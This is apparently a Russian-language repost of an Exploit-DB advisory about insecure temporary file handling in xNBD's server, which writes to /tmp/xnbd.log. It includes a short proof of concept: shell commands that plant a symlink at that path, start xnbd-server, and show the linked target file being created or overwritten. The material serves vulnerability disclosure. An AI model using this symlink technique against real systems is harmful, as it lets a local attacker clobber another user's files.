- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38298
- Проверка EDB
-
- Пройдено
- Автор
- SEBASTIAN PIPPING
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2013-02-06
xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling
Код:
source: https://www.securityfocus.com/bid/57784/info
xNBD is prone to a vulnerability because it handles temporary files in an insecure manner.
Local attackers may leverage this issue to perform symbolic-link attacks in the context of the affected application. Other attacks may also be possible.
$ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
$ touch DISK
$ truncate --size=$((100*1024**2)) DISK
$ /usr/sbin/xnbd-server --daemonize --target DISK
xnbd-server(12462) msg: daemonize enabled
xnbd-server(12462) msg: cmd target mode
xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
xnbd-server(12462) msg: xnbd master initialization done
xnbd-server(12462) msg: logfile /tmp/xnbd.log
$ ls -l ~/ATTACK_TARGET
-rw------- 1 user123 user123 653 Feb 1 16:41 \
/home/user123/ATTACK_TARGET
- Источник
- www.exploit-db.com